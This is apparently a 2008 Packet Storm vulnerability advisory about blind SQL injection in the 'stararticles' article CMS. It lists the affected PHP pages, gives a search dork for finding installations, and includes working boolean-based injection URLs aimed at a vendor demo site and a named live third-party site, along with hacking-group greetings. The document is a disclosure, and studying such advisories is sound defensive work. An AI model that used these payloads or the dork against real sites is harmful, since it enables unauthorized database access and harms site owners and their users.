stararticles-sql.txt

2008-11-26T00:00:00
ID PACKETSTORM:72338
Type packetstorm
Reporter b3hz4d
Modified 2008-11-26T00:00:00

Description

                                        
                                            ` ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+ +  
+ stararticles blind sql injection Vulnerability +  
+ +  
+ Discovered by b3hz4d +  
+ +  
+ WwW.DeltaHacking.Net +  
+ +  
+ +  
+ +  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
APA Center of Yazd University   
(https://www.ircert.cc)   
  
  
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)  
DATE : 26 nov 2008  
SITE : WwW.DeltaHacking.Net  
CONTACT: behzad_sh_66@yahoo.com  
  
#####################################################  
  
APPLICATION : stararticles  
DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5  
VENDOR : http://www.stararticles.com/  
DEMO : http://www.kalptarudemos.com/demo/stararticle/  
DORK : inurl:"article.download.php"  
  
#####################################################  
  
  
[+] vuln : blind sql injection  
  
many of pages are vulnerable to blind sql injection:  
  
./article.list.php  
  
./article.print.php  
  
./article.comments.php  
  
./article.publisher.php  
  
.  
.  
.  
  
[+] Exploit :   
true:  
  
http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=5  
http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=5  
  
false:  
  
http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=4  
http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=4  
  
  
##########################################################################################################  
  
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #  
  
##########################################################################################################  
  
`